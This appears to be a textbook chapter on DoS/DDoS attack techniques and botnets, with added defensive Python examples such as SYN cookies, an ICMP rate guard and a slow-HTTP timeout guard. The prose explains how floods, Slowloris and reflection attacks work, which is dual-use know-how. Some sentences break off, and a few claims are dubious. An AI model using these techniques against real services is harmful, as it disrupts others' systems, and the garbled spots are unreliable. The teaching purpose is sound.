In these attacks, the attacker attempts to exploit vulnerabilities in the application layer protocol or in the application itself to prevent legitimate users from accessing the application. Attacks on unpatched, vulnerable systems do not require as much bandwidth as protocol or volumetric DDoS attacks for succeeding. In application DDoS attacks, the application layer or application resources are consumed by opening connections and leaving them open until no new connections can be made. These attacks destroy a specific aspect of an application or service and can be effective with one or a few attacking machines that produce a low traffic rate. Furthermore, these attacks are very difficult to detect and mitigate. The magnitude of attack is measured in requests per second (rps).

Application-level flood attacks result in the loss of services of a particular network, such as emails and network resources, or the temporary shutdown of applications and services. Through this attack, attackers exploit weaknesses in programming source code to prevent the application from processing legitimate requests.

Several kinds of DoS attacks rely on software-related exploits such as buffer overflows. A buffer overflow attack sends excessive data to an application that either shuts down the application or forces the data sent to the application to run on the host system. The attack crashes a vulnerable system remotely by sending excessive traffic to an application. Occasionally, attackers can also execute arbitrary code on the remote system via a buffer overflow. Sending too much data to an application overwrites the data that controls the program, enabling the hacker to run their code instead.

Using application-level flood attacks, attackers attempt to do the following:

- Flood web applications with legitimate user traffic
- Disrupt service to a specific system or person by, for example, blocking a user's access through repeated invalid login attempts
- Jam the application database connection by crafting malicious Structured Query Language (SQL) queries

Application-level flood attacks can result in a substantial loss of money, service, and reputation for organizations. These attacks occur after the establishment of a connection. Because a connection is established and the traffic entering the target appears to be legitimate, it is difficult to detect these attacks. However, if the user identifies the attack, they can stop it and trace it back to its source more easily than other types of DDoS attacks.

The following are examples for application layer attack techniques:

- Hypertext Transfer Protocol (HTTP) flood attack
- Slowloris attack
- UDP application layer flood attack
DoS/DDoS Attack Techniques

Next, the following DoS/DDoS attack techniques will be discussed:

- UDP flood attack
- ICMP flood attack
- Ping of Death attack
- Smurf attack
- Pulse wave attack
- Zero-day attack
- SYN flood attack
- Fragmentation attack
- ACK flood attack
- TCP state exhaustion attack
- Spoofed session flood attack
- HTTP GET/POST attack
- Slowloris attack
- UDP application layer flood attack
- Multi-vector attack
- Peer-to-peer attack
- Permanent DoS (PDoS) attack
- Distributed reflection DoS (DRDoS) attack
UDP Flood Attack

In a UDP flood attack, an attacker sends spoofed UDP packets at a very high packet rate to a remote host on random ports of the target server by using a large source IP range. The flooding of UDP packets causes the server to check repeatedly for nonexistent applications at the ports. Consequently, legitimate applications become inaccessible by the system, and any attempts to access them return an error reply with an ICMP "Destination Unreachable" packet. This attack consumes network resources and available bandwidth, exhausting the network until it goes offline.
Figure 10.3: UDP flood attack
ICMP Flood Attack

Network administrators use ICMP primarily for IP operations, troubleshooting, and error messaging for undeliverable packets. In this attack, attackers send large volumes of ICMP echo request packets to a victim's system directly or through reflection networks. These packets signal the victim's system to reply, and the large traffic saturates the bandwidth of the victim's network connection, causing it to be overwhelmed and subsequently stop responding to legitimate TCP/IP requests.

To protect against ICMP flood attacks, it is necessary to set a threshold that invokes the ICMP flood attack protection feature when exceeded. When the ICMP threshold is exceeded (by default, the threshold value is 1000 packets/s), the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second as well as the next second.
Figure 10.4: ICMP flood attack
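The threshold policy described above, as an added Python illustration (not the textbook's code): per security zone, once echo requests exceed the threshold within one second, every further echo request from that zone is rejected for the rest of that second and the whole of the next one. The zone map, the sample addresses and the low demo threshold are constructed for the example.

```python
from collections import defaultdict

DEFAULT_THRESHOLD = 1000  # packets/s, the default quoted in the text


class IcmpFloodGuard:
    """Models a router's ICMP flood protection: a per-zone echo-request threshold."""

    def __init__(self, zone_of, threshold=DEFAULT_THRESHOLD):
        self.zone_of = zone_of            # assumed mapping: source IP -> security zone
        self.threshold = threshold
        self.count = defaultdict(int)     # (zone, whole second) -> echo requests counted
        self.block_until = {}             # zone -> last whole second that is blocked

    def handle_echo_request(self, src_ip, t):
        """Decide 'accept' or 'reject' for an ICMP echo request from src_ip at time t (s)."""
        zone = self.zone_of.get(src_ip, "untrust")
        sec = int(t)
        if self.block_until.get(zone, -1) >= sec:
            return "reject"                   # zone is still inside its penalty window
        key = (zone, sec)
        self.count[key] += 1
        if self.count[key] > self.threshold:
            # Threshold exceeded: drop this packet and reject the whole zone for the
            # remainder of this second plus the next second.
            self.block_until[zone] = sec + 1
            return "reject"
        return "accept"


def replay(guard, trace):
    """Replay (src_ip, time) pairs and return the accept/reject tally."""
    tally = {"accept": 0, "reject": 0}
    for src_ip, t in trace:
        tally[guard.handle_echo_request(src_ip, t)] += 1
    return tally


def demo():
    """Constructed trace with a threshold of 5 so the behaviour is readable."""
    zones = {"10.0.0.5": "trust", "203.0.113.7": "untrust", "198.51.100.9": "untrust"}
    guard = IcmpFloodGuard(zones, threshold=5)
    trace = [("203.0.113.7", i * 0.01) for i in range(8)]  # 8 echoes in second 0: 5 pass, 3 rejected
    trace.append(("198.51.100.9", 0.5))   # same zone, same second: rejected
    trace.append(("10.0.0.5", 0.6))       # different zone: unaffected
    trace.append(("198.51.100.9", 1.5))   # next second is still blocked
    trace.append(("198.51.100.9", 2.1))   # penalty expired: accepted
    return replay(guard, trace)


if __name__ == "__main__":
    print(demo())  # {'accept': 7, 'reject': 5}
```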
Ping of Death and Smurf Attacks
Ping of Death Attack

In a Ping of Death (PoD) attack, an attacker attempts to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets using a simple ping command. Suppose an attacker sends a packet with a size of 65,538 bytes to the target web server. This size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process performed by the receiving system might cause the system to crash. In such attacks, the attacker's identity can be easily spoofed, and the attacker might not need detailed knowledge of the target machine, except its IP address.
Smurf Attack

In a Smurf attack, the attacker spoofs the source IP address with the victim's IP address and sends a large number of ICMP ECHO request packets to an IP broadcast network. This causes all the hosts on the broadcast network to respond to the received ICMP ECHO requests. These responses are sent to the victim's machine because the IP address was spoofed by the attacker, causing significant traffic to the victim's machine and ultimately making it crash.
Figure 10.6: Smurf attack
Pulse Wave and Zero-Day DDoS Attacks
Pulse Wave DDoS Attack

Pulse wave DDoS attacks are the latest type of DDoS attacks employed by threat actors to disrupt the standard operations of targets. Generally, DDoS attack patterns are continuous incoming traffic flows. However, in pulse wave DDoS attacks, the attack pattern is periodic, and the attack is huge, consuming the entire bandwidth of target networks. Attackers send a highly repetitive train of packets as pulses to the target victim every 10 min, and the attack session lasts for approximately an hour or some days. A single pulse (300 Gbps or more) is more than enough to crowd a network pipe. Recovery from such attacks is very difficult and occasionally impossible.
Figure 10.7: Pulse wave DDoS attack
Zero-Day DDoS Attack

Zero-day DDoS attacks are attacks in which DDoS vulnerabilities do not have patches or effective defensive mechanisms. Until the victim identifies the threat actor's attack strategy and deploys a patch for the exploited DDoS vulnerability, the attacker actively blocks all the victim's resources and steals the victim's data. These attacks can cause severe damage to the victim's network infrastructure and assets. Currently, there is no versatile approach to protect networks from this type of attack.
SYN Flood Attack
In a SYN attack, the attacker sends a large number of SYN requests to the target server (victim) with fake source IP addresses. The attack creates incomplete TCP connections that use up network resources. Normally, when a client wants to begin a TCP connection to a server, the client and server exchange the following series of messages:

- A TCP SYN request packet is sent to a server.
- The server sends a SYN/ACK (acknowledgement) in response to the request.
- The client sends a response ACK to the server to complete the session setup.

This method is a "three-way handshake."

In a SYN attack, the attacker exploits the three-way handshake method. First, the attacker sends a fake TCP SYN request to the target server. After the server sends a SYN/ACK in response to the client's (attacker's) request, the client never sends an ACK response. This leaves the server waiting to complete the connection.

SYN flooding takes advantage of the flawed manner in which most hosts implement the TCP three-way handshake. This attack occurs when the attacker sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, a connection is established with the TCP three-way handshake. The host keeps track of partially open connections while waiting for response ACK packets in a listening queue.
As shown in the figure, when Host B receives a SYN request from Host A, it must keep track of the partially opened connection in a "listen queue" for at least 75 s.

Figure 10.8: SYN flood attack
A malicious host can exploit another host, managing many partial connections by sending many SYN requests to the target host simultaneously. When the queue is full, the system cannot open new connections until it drops some entries from the connection queue through timeouts. This ability to hold up each incomplete handshake connection for 75 s can be cumulatively exploited in a DoS attack. The attack uses fake IP addresses, making it difficult to trace the source. An attacker can fill a table of connections even without spoofing the source IP address.

In addition to SYN flood attacks, attackers can also employ SYN-ACK and ACK/PUSH ACK flood attacks to disrupt target machines. All these attacks are similar in functionality with minor variations.
SYN-ACK Flood Attack

This type of attack is similar to the SYN flood attack, except that in this type of flood attack, the attacker exploits the second stage of a three-way handshake by sending a large number of SYN-ACK packets to the target machine to exhaust its resources.

ACK and PUSH ACK Flood Attack

During an active TCP session, ACK and PUSH ACK are the flags used to transfer information to and from the server and client machines till the session ends. In an ACK and PUSH ACK flood attack, attackers send a large amount of spoofed ACK and PUSH ACK packets to the target machine, making it non-functional.
Countermeasures for SYN Flood Attacks

Proper packet filtering is a viable solution to SYN flood attacks. An administrator can also tune the TCP/IP stack to reduce the impact of SYN attacks while allowing legitimate client traffic. Some SYN attacks do not attempt to upset servers; instead, they attempt to consume the entire bandwidth of the Internet connection. Two tools to counter this attack are SYN cookies and SynAttackProtect.

To guard against an attacker attempting to consume the bandwidth of an Internet connection, an administrator can implement some additional safety measures; for example, they can decrease the time-out period in which a pending connection is maintained in the "SYN RECEIVED" state in the queue. Normally, if a client sends no response ACK, a server will retransmit the first ACK packet. This vulnerability can be removed by decreasing the time of the first packet's retransmission, decreasing the number of packet retransmissions, or turning off packet retransmissions entirely.
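SYN cookies, one of the two tools named above, as an added Python illustration (not the textbook's code): the server answers a SYN with a SYN/ACK whose initial sequence number is a keyed hash of the connection tuple plus a coarse time counter, and stores nothing; when the ACK returns, it rebuilds the cookie and checks that ack_number - 1 matches, so half-open entries never fill the listen queue. The secret key, the MSS table, the counter period and the sample addresses are constructed.

```python
import hashlib
import hmac

SECRET = b"constructed-demo-key"       # a real server draws this at boot; constructed here
MSS_TABLE = [536, 1220, 1440, 1460]    # encodable MSS values (2 bits); constructed table
COUNTER_PERIOD = 64                    # seconds per counter tick; cookies expire after 2 ticks
MAC_BITS = 25
MAC_MASK = (1 << MAC_BITS) - 1


def _mac(src, sport, dst, dport, counter):
    """Keyed hash over the connection tuple and the time counter, truncated to MAC_BITS."""
    msg = f"{src}:{sport}>{dst}:{dport}|{counter}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big") & MAC_MASK


def make_cookie(src, sport, dst, dport, client_mss, now):
    """Initial sequence number for the SYN/ACK; encodes everything the server needs.

    Layout (32 bits): 5-bit counter mod 32 | 2-bit MSS index | 25-bit MAC.
    Because nothing is stored, a flood of SYNs cannot fill a listen queue."""
    counter = int(now // COUNTER_PERIOD)
    mss_idx = 0
    for i, mss in enumerate(MSS_TABLE):   # largest table entry not above the client's offer
        if mss <= client_mss:
            mss_idx = i
    return ((counter & 0x1F) << 27) | (mss_idx << 25) | _mac(src, sport, dst, dport, counter)


def check_cookie(src, sport, dst, dport, ack_number, now):
    """Validate the ACK that completes the handshake.

    Returns the negotiated MSS when ack_number - 1 is a cookie issued for this tuple
    within the current or previous counter tick, otherwise None (the ACK is dropped)."""
    cookie = (ack_number - 1) & 0xFFFFFFFF
    counter_bits = cookie >> 27
    mss_idx = (cookie >> 25) & 0x3
    mac = cookie & MAC_MASK
    now_counter = int(now // COUNTER_PERIOD)
    for age in (0, 1):
        counter = now_counter - age
        if counter < 0:
            continue
        if (counter & 0x1F) == counter_bits and _mac(src, sport, dst, dport, counter) == mac:
            return MSS_TABLE[mss_idx]
    return None


def handshake_roundtrip(src, sport, dst, dport, client_mss, syn_time, ack_time):
    """Simulate: client SYN at syn_time, server SYN/ACK carrying the cookie, client ACK at ack_time."""
    isn = make_cookie(src, sport, dst, dport, client_mss, syn_time)
    ack_number = (isn + 1) & 0xFFFFFFFF   # a genuine client acknowledges ISN + 1
    return check_cookie(src, sport, dst, dport, ack_number, ack_time)


if __name__ == "__main__":
    print(handshake_roundtrip("198.51.100.4", 40001, "192.0.2.10", 80, 1460, 1000.0, 1000.2))  # 1460
```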
Fragmentation Attack
These attacks destroy a victim's ability to reassemble fragmented packets by flooding it with TCP or UDP fragments, resulting in reduced performance. In fragmentation attacks, the attacker sends a large number of fragmented (1500+ byte) packets to a target web server with a relatively small packet rate. Since the protocol allows fragmentation, these packets are usually uninspected as they pass through network equipment such as routers, firewalls, and the intrusion detection system (IDS)/intrusion prevention system (IPS). The reassembly and inspection of these large fragmented packets consume excessive resources. Moreover, the content in the packet fragments is randomized by the attacker, which makes the reassembly and inspection consume more resources and, in turn, causes the system to crash.
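An IP fragment reassembler that enforces the two limits the Ping of Death passage and the fragmentation attack passage above turn on, as an added Python example (not the textbook's code): a reassembled datagram may never exceed the 65,535-byte ceiling of RFC 791, and incomplete reassembly buffers are capped per source and expired, so never-completing fragments cannot pin memory. The fragment record, the buffer limits, the timeout and the sample fragments are constructed.

```python
from dataclasses import dataclass, field

IP_HEADER_LEN = 20
MAX_DATAGRAM = 65535                     # RFC 791: the total-length field is 16 bits
MAX_PAYLOAD = MAX_DATAGRAM - IP_HEADER_LEN
MAX_PENDING_PER_SRC = 4                  # incomplete datagrams kept per source (constructed)
REASSEMBLY_TIMEOUT = 30.0                # seconds before an incomplete datagram is dropped


@dataclass
class Fragment:
    src: str
    ident: int        # IP identification field shared by all fragments of one datagram
    offset: int       # fragment offset in 8-byte units, as carried in the IP header
    more: bool        # MF flag: True for every fragment except the last
    payload: bytes


@dataclass
class _Pending:
    first_seen: float
    pieces: dict = field(default_factory=dict)   # byte offset -> payload
    total_len: int = -1                           # known once the MF=0 fragment arrives


class Reassembler:
    def __init__(self):
        self.pending = {}    # (src, ident) -> _Pending
        self.dropped = []    # (reason, src, ident)

    def _expire(self, now):
        for key, p in list(self.pending.items()):
            if now - p.first_seen > REASSEMBLY_TIMEOUT:
                del self.pending[key]
                self.dropped.append(("timeout", key[0], key[1]))

    def feed(self, frag, now):
        """Accept one fragment; return the reassembled payload when complete, else None."""
        self._expire(now)
        key = (frag.src, frag.ident)
        start = frag.offset * 8
        end = start + len(frag.payload)
        if end > MAX_PAYLOAD:
            # Ping of Death: the datagram would exceed 65,535 bytes. Discard the whole
            # datagram instead of growing a buffer the length field cannot describe.
            self.pending.pop(key, None)
            self.dropped.append(("oversize", frag.src, frag.ident))
            return None
        if key not in self.pending:
            if sum(1 for s, _ in self.pending if s == frag.src) >= MAX_PENDING_PER_SRC:
                # Fragmentation flood: never-completing datagrams must not pin memory.
                self.dropped.append(("pending_limit", frag.src, frag.ident))
                return None
            self.pending[key] = _Pending(first_seen=now)
        p = self.pending[key]
        p.pieces[start] = frag.payload
        if not frag.more:
            p.total_len = end
        if p.total_len < 0:
            return None
        covered = 0                                  # check [0, total_len) has no gaps
        for off in sorted(p.pieces):
            if off > covered:
                return None
            covered = max(covered, off + len(p.pieces[off]))
        if covered < p.total_len:
            return None
        data = bytearray(p.total_len)
        for off, chunk in p.pieces.items():
            data[off:off + len(chunk)] = chunk
        del self.pending[key]
        return bytes(data)


def demo():
    """Constructed fragments: one valid datagram, one Ping of Death, one flood."""
    r = Reassembler()
    r.feed(Fragment("198.51.100.4", 1, 0, True, b"A" * 16), 0.0)
    out = r.feed(Fragment("198.51.100.4", 1, 2, False, b"B" * 8), 0.1)      # offset 2 * 8 = 16
    pod = r.feed(Fragment("203.0.113.7", 2, 8189, False, b"\x00" * 6), 1.0)  # ends at byte 65,518
    for ident in range(10, 16):                                              # six datagrams never finish
        r.feed(Fragment("203.0.113.8", ident, 0, True, b"\xff" * 8), 2.0)
    r.feed(Fragment("198.51.100.4", 3, 0, True, b"C" * 8), 40.0)            # triggers the 30 s sweep
    return out, pod, r.dropped
```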
Figure: Fragmentation attack (original packet with data segments 1 to 4, sent as fragments 1 to 4)
Spoofed Session Flood Attack
In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets. Attackers employ this attack to bypass firewalls and perform DDoS attacks against target networks, exhausting their network resources.

The following are examples for spoofed session flood attacks:

Multiple SYN-ACK Spoofed Session Flood Attack

In this type of flood attack, attackers create a fake session with multiple SYN and multiple ACK packets, along with one or more RST or FIN packets.

Multiple ACK Spoofed Session Flood Attack

In this type of flood attack, attackers create a fake session by completely skipping SYN packets and using only multiple ACK packets along with one or more RST or FIN packets. Because SYN packets are not employed and firewalls mostly use SYN packet filters to detect abnormal traffic, the DDoS detection rate of the firewalls is very low for these types of attacks.
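A stateful handshake tracker that serves as a detector for both the SYN flood passage (half-open connections piling up in the listen queue) and the spoofed session flood passage above (ACK/RST/FIN traffic for sessions that never sent a SYN, which a SYN-only filter misses), as an added Python example (not the textbook's code). The packet record, the tiny half-open limit and the sample trace are constructed; the 75 s half-open timeout is the figure from the text.

```python
from dataclasses import dataclass

HALF_OPEN_TIMEOUT = 75.0    # seconds a half-open entry is kept, as in the text's figure
HALF_OPEN_LIMIT = 3         # half-open connections before an alert (constructed, tiny for the demo)


@dataclass
class Packet:
    t: float
    src: str
    sport: int
    dst: str
    dport: int
    flags: str              # TCP flag letters, e.g. "S", "A", "PA", "R", "F"


class HandshakeTracker:
    """Follows inbound TCP handshakes toward one server and raises two alert kinds:
    syn_flood when the half-open (SYN_RECEIVED) count exceeds HALF_OPEN_LIMIT, and
    no_syn_session when ACK/RST/FIN traffic arrives for a session that never sent a SYN."""

    def __init__(self, server_ip):
        self.server_ip = server_ip
        self.state = {}        # (client ip, client port) -> "SYN_RECEIVED" | "ESTABLISHED"
        self.opened_at = {}    # (client ip, client port) -> time the SYN arrived
        self.alerts = []       # (kind, client ip, detail)

    def _expire_half_open(self, now):
        for key, t0 in list(self.opened_at.items()):
            if self.state.get(key) == "SYN_RECEIVED" and now - t0 > HALF_OPEN_TIMEOUT:
                del self.state[key]
                del self.opened_at[key]

    def half_open(self):
        return sum(1 for s in self.state.values() if s == "SYN_RECEIVED")

    def observe(self, pkt):
        self._expire_half_open(pkt.t)
        if pkt.dst != self.server_ip:
            return                                  # only inbound packets are modelled
        key = (pkt.src, pkt.sport)
        if pkt.flags == "S":
            self.state[key] = "SYN_RECEIVED"        # server would answer SYN/ACK and wait
            self.opened_at[key] = pkt.t
            if self.half_open() > HALF_OPEN_LIMIT:
                self.alerts.append(("syn_flood", pkt.src, self.half_open()))
        elif key not in self.state:
            # ACK-only, RST or FIN for an unknown session: exactly the traffic a
            # SYN-filter firewall would never examine.
            self.alerts.append(("no_syn_session", pkt.src, pkt.flags))
        elif "A" in pkt.flags and self.state[key] == "SYN_RECEIVED":
            self.state[key] = "ESTABLISHED"         # third step of the handshake completed

    def summary(self):
        return {
            "half_open": self.half_open(),
            "established": sum(1 for s in self.state.values() if s == "ESTABLISHED"),
            "syn_flood_alerts": sum(1 for a in self.alerts if a[0] == "syn_flood"),
            "no_syn_alerts": sum(1 for a in self.alerts if a[0] == "no_syn_session"),
        }


def demo():
    """Constructed trace: one real client, a burst of spoofed SYNs, an ACK-only session."""
    srv = "192.0.2.10"
    trk = HandshakeTracker(srv)
    trace = [Packet(0.0, "198.51.100.4", 40001, srv, 80, "S"),
             Packet(0.1, "198.51.100.4", 40001, srv, 80, "A")]
    trace += [Packet(1.0 + i, f"203.0.113.{i + 1}", 1000, srv, 80, "S") for i in range(5)]
    trace += [Packet(6.0, "203.0.113.9", 5000, srv, 80, "A"),
              Packet(6.5, "203.0.113.9", 5000, srv, 80, "R"),
              Packet(81.0, "198.51.100.4", 40002, srv, 80, "S")]  # spoofed entries have aged out
    for pkt in trace:
        trk.observe(pkt)
    return trk.summary()
```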
HTTP GET/POST and Slowloris Attacks
HTTP GET/POST Attack

HTTP attacks are layer-7 attacks. HTTP clients, such as web browsers, connect to a web server through HTTP to send HTTP requests, which can be either HTTP GET or HTTP POST. Attackers exploit these requests to perform DoS attacks.

In an HTTP GET attack, the attacker uses a time-delayed HTTP header to hold on to an HTTP connection and exhaust web-server resources. The attacker never sends the full request to the target server. Consequently, the server retains the HTTP connection and waits, making it inaccessible for legitimate users. In these types of attacks, all the network parameters appear healthy while the service remains unavailable.

In an HTTP POST attack, the attacker sends HTTP requests with complete headers but an incomplete message body to the target web server or application. Because the message body is incomplete, the server waits for the rest of the body, making the web server or web application unavailable to legitimate users.
Figure: HTTP GET attack (request with time-delayed HTTP header; target server waiting for the complete header) and HTTP POST attack (target server waiting for the message body)

... extreme damage to the target.
Random Recursive GET Flood Attack

This type of attack is a tweaked version of the recursive GET flood attack. It is designed for forums, blogs, and other websites that have pages in a sequence. Similar to the recursive GET flood attack, in this attack, the recursive GET pretends to be going through pages. Because the targets are forums, groups, and other blogs, the attacker uses random numbers from a valid page range to pose as a legitimate user and sends a new GET request each time. In both recursive GET and random recursive GET flood attacks, the target is bombarded with a large number of GET requests, exhausting its resources.
Slowloris Attack

Slowloris is a DDoS attack tool used to perform layer-7 DDoS attacks to take down web infrastructure. It is distinctly different from other tools in that it uses perfectly legitimate HTTP traffic to take down a target server. In Slowloris attacks, the attacker sends partial HTTP requests to the target web server or application. Upon receiving the partial requests, the target server opens multiple connections and waits for the requests to complete. However, these requests remain incomplete, causing the target server's maximum concurrent connection pool to be filled up and additional connection attempts to be denied.
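A server-side watchdog for the three slow HTTP attacks described above (time-delayed GET headers, incomplete POST bodies, and Slowloris partial requests), as an added Python example (not the textbook's or the Slowloris tool's code): each connection must finish its header within HEADER_TIMEOUT and deliver its declared Content-Length within BODY_TIMEOUT, and one client address may hold at most MAX_CONN_PER_IP connections. The limits, the host name and the sample connection events are constructed.

```python
from collections import defaultdict

HEADER_TIMEOUT = 10.0      # seconds a client gets to finish the request header (constructed)
BODY_TIMEOUT = 30.0        # seconds to deliver the Content-Length bytes it declared
MAX_CONN_PER_IP = 3        # concurrent connections allowed per client address


class _Conn:
    def __init__(self, ip, opened):
        self.ip = ip
        self.opened = opened
        self.buf = b""
        self.header_done_at = None
        self.content_length = 0


class SlowRequestGuard:
    """Times out connections that dribble headers (Slowloris, delayed GET header) or never
    finish a declared body (incomplete POST), and caps connections per client address."""

    def __init__(self):
        self.conns = {}
        self.per_ip = defaultdict(int)
        self.verdicts = {}     # connection id -> why it ended

    def open(self, cid, ip, now):
        if self.per_ip[ip] >= MAX_CONN_PER_IP:
            self.verdicts[cid] = "refused_per_ip_limit"
            return False
        self.conns[cid] = _Conn(ip, now)
        self.per_ip[ip] += 1
        return True

    def _close(self, cid, reason):
        conn = self.conns.pop(cid)
        self.per_ip[conn.ip] -= 1
        self.verdicts[cid] = reason

    def receive(self, cid, data, now):
        conn = self.conns.get(cid)
        if conn is None:
            return
        conn.buf += data
        if conn.header_done_at is None and b"\r\n\r\n" in conn.buf:
            head, _, body = conn.buf.partition(b"\r\n\r\n")
            conn.header_done_at = now
            for line in head.split(b"\r\n")[1:]:          # skip the request line
                name, _, value = line.partition(b":")
                if name.strip().lower() == b"content-length":
                    conn.content_length = int(value.strip() or b"0")
            conn.buf = body
        if conn.header_done_at is not None and len(conn.buf) >= conn.content_length:
            self._close(cid, "request_complete")

    def sweep(self, now):
        """Periodic timer: enforce the two time limits on every open connection."""
        for cid, conn in list(self.conns.items()):
            if conn.header_done_at is None and now - conn.opened > HEADER_TIMEOUT:
                self._close(cid, "header_timeout")
            elif conn.header_done_at is not None and now - conn.header_done_at > BODY_TIMEOUT:
                self._close(cid, "body_timeout")


def demo():
    """Constructed session: one normal client and one address holding connections open."""
    g = SlowRequestGuard()
    g.open(1, "198.51.100.4", 0.0)
    g.receive(1, b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n", 0.1)
    g.open(2, "203.0.113.7", 0.0)                       # Slowloris-style: header never ends
    g.receive(2, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n", 0.5)
    g.receive(2, b"X-a: 1\r\n", 8.0)
    g.open(3, "203.0.113.7", 1.0)                       # complete header, body never finishes
    g.receive(3, b"POST /upload HTTP/1.1\r\nHost: www.example.com\r\n"
                 b"Content-Length: 100\r\n\r\n0123456789", 1.2)
    g.open(4, "203.0.113.7", 2.0)                       # third connection from the same address
    g.open(5, "203.0.113.7", 2.0)                       # fourth one: refused
    g.sweep(12.0)
    g.sweep(40.0)
    return dict(g.verdicts)
```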
Figure: Normal HTTP request-response connection compared with a Slowloris DDoS attack
UDP Application Layer Flood Attack
Though UDP flood attacks are known for their volumetric attack nature, some application layer protocols that rely on UDP can be employed by attackers to perform flood attacks on target networks.

The following are examples for UDP-based application layer protocols that attackers can employ for flooding target networks:

- Character Generator Protocol (CHARGEN)
- Simple Network Management Protocol Version 2 (SNMPv2)
- Quote of the Day (QOTD)
- Remote procedure call (RPC)
- Voice over Internet Protocol (VoIP)
- Trivial File Transfer Protocol (TFTP)
- Network Basic Input/Output System (NetBIOS)
- NTP
- Quake Network Protocol
- SSDP
- Steam Protocol
- Connection-less Lightweight Directory Access Protocol (CLDAP)
Multi-Vector Attack
In multi-vector DDoS attacks, the attacker uses combinations of volumetric, protocol, and application layer attacks to take down the target system or service. The attacker quickly changes from one form of DDoS attack (e.g., SYN packets) to another (layer 7). These attacks are either launched through one vector at a time or through multiple vectors in parallel to confuse a company's IT department, making them spend all their resources and maliciously diverting their focus.
Figure 10.12: Multi-vector attack (in sequence and in parallel)
Peer-to-Peer Attack
A peer-to-peer attack is a form of DDoS attack in which the attacker exploits a number of bugs in peer-to-peer servers to initiate a DDoS attack. Attackers exploit flaws found in networks that use the Direct Connect (DC++) protocol, which allows the exchange of files between instant-messaging clients. This kind of attack does not use botnets. Unlike a botnet-based attack, a peer-to-peer attack eliminates the need for attackers to communicate with the clients they subvert. Here, the attacker instructs clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and instead connect to the victim's website. Consequently, several thousand computers may aggressively attempt to connect to a target website, causing a drop in the performance of the target website. It is easy to identify peer-to-peer attacks based on signatures. By using this method, attackers launch massive DoS attacks to compromise websites.

Peer-to-peer DDoS attacks can be minimized by specifying ports for peer-to-peer communication. For example, specifying port 80 to disallow peer-to-peer communication minimizes the possibility of attacks on websites.
Figure 10.13: Peer-to-peer attack
Permanent Denial-of-Service Attack
Permanent DoS (PDoS) attacks, also known as phlashing, purely target hardware and cause irreversible damage to the hardware. Unlike other types of DoS attacks, it sabotages the system hardware, requiring the victim to replace or reinstall the hardware. The PDoS attack exploits security flaws in a device to allow remote administration on the management interfaces of the victim's hardware, such as printers, routers, and other networking devices.

This type of attack is quicker and more destructive than conventional DoS attacks. It works with a limited amount of resources, unlike a DDoS attack, in which attackers unleash a set of zombies onto a target. Attackers perform PDoS attacks by using a method known as the "bricking" of a system. In this method, the attacker sends emails, IRC chats, tweets, or videos with fraudulent content for hardware updates to the victim. The hardware updates are modified and corrupted with vulnerabilities or defective firmware. When the victim clicks on a link or pop-up window referring to the fraudulent hardware update, the victim installs it in their system. Consequently, the attacker attains complete control over the victim's system.
Figure: Permanent Denial-of-Service attack (attacker sends emails, IRC chats, tweets, posts, or videos with fraudulent content for hardware updates)
Distributed Reflection Denial-of-Service (DRDoS) Attack
A distributed reflection DoS (DRDoS) attack, also known as a "spoofed" attack, involves the use of multiple intermediary and secondary machines that contribute to a DDoS attack against a
Figure 10.15: Distributed reflection DoS (DRDoS) attack (primary attacker, intermediary victims, secondary victims)

Countermeasures

- Turn off the Character Generator Protocol (CHARGEN) service to stop this attack method
- Download the latest updates and patches for servers
Module Flow

Botnets

The term "bot" is a contraction of "robot" and refers to software applications that run automated tasks over the Internet. Attackers use bots to infect a large number of computers that form a network, or "botnet," allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime.

This section deals with organized cyber-crime syndicates, organizational charts, botnets, and botnet ecosystems; botnet propagation techniques; scanning methods for finding vulnerable machines; and the propagation of malicious code.
Organized Cyber Crime: Organizational Chart
Organized CrimeSyndicates
While cyber criminals worked independently in the past, they now tend to operate in organized groups. They are increasingly associated with organized crime syndicates and take advantage of the sophisticated techniques of these syndicates to engage in illegal activity, usually for monetary benefit. There are organized groups of cyber criminals who work in a hierarchical setup with a predefined revenue-sharing model, which is a kind of major corporation that offers criminal services. Organized groups create and rent botnets and offer various services ranging from the development of malware and hacking of bank accounts to the deployment of massive DoS attacks against any target for a price.

For example, an organized crime syndicate might perform a DDoS attack against a bank to divert the attention of the bank's security team while they clean out bank accounts with stolen account credentials. The growing involvement of organized criminal syndicates in politically motivated cyber warfare and hacktivism is a matter of concern for national security agencies.

Cybercrime features a complicated range of players, and cyber criminals are paid according to the task they perform or the position they hold. The head of the cybercrime organization (i.e., the boss) acts as a business entrepreneur. The boss does not commit any crimes directly. Immediately below the boss in the organizational hierarchy is the "underboss," who sets up a C&C server and crimeware toolkit database to manage the implementation of attacks and provide Trojans. Below the underboss are various "campaign managers" with their own affiliation networks for implementing attacks and stealing data. Finally, resellers sell the stolen
Botnets
- Bots are software applications that run automated tasks over the Internet and perform repetitive tasks, such as web spidering and search engine indexing
- A botnet is a huge network of compromised systems and can be used by an attacker to launch denial-of-service attacks
Bots are used for benign data collection or data mining activities, such as "web spidering," as well as to coordinate DoS attacks. The main purpose of a bot is to collect data. There are different types of bots, such as Internet bots, IRC bots, and chatterbots. Examples for IRC bots are Supybot, Sopel, EnergyMech, and Eggdrop.

A botnet (a contraction of "roBOT NETwork") is a group of computers "infected" by bots; however, botnets can be used for both positive and negative purposes. As a hacking tool, a botnet is composed of a huge network of compromised systems. A relatively small botnet of 1,000 bots has a combined bandwidth larger than the bandwidth of most corporate systems. The advent of botnets led to an enormous increase in cybercrime. Botnets form the core of the cybercriminal activity center that links and unites various parts of the cybercriminal world. Cybercriminal service suppliers are a part of the cybercrime network. They offer services such as malicious code development, bulletproof hosting, the creation of browser exploits, and encryption and packing.
Attackers can use botnets to perform the following:
- DDoS attacks: Botnets can generate DDoS attacks, which consume the bandwidth of the victim's computers. Botnets can also overload a system, wasting valuable host system resources and destroying network connectivity.
